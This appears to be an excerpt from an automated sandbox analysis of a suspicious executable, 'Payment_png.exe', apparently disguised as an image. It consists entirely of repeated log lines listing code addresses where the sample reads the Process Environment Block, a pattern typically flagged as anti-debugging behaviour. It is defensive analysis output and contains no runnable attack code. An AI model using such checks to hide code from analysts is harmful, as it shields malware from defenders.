      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3B8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E37F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E427794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3DBC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E43C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E426C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E47740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3C746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3DA44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E478CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3B849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E426CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E4614FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E423540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E453D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3AAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3CC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3C7D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E478D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E42A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E3D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E46E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D35A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E458DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4705AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4705AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46EA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E434257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C3A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E45B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E45B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E478A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A5210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B8A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DFAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D2AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D2ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E478B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3ADB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AF358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3ADB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4253CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4253CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4523E3 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4523E3 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E4523E3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D2397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DB390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D138B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D138B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D138B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E45D380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E46138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CDBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E475BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3BB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E471074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E462073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E474015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E474015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E427016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E427016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E427016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DF0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3E90AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E43B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E423884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E423884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3D513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C4120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3A9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3AC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3CB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exeCode function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]
